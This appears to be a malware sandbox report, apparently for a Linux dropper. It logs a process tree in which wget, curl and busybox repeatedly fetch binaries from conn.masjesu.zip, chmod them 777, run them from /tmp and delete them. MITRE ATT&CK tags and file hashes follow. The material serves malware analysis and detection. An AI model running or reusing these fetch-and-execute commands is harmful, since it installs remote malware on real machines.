/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:971
-
-
/bin/chmodchmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb./200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:1002
-
-
/bin/chmodchmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1007
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97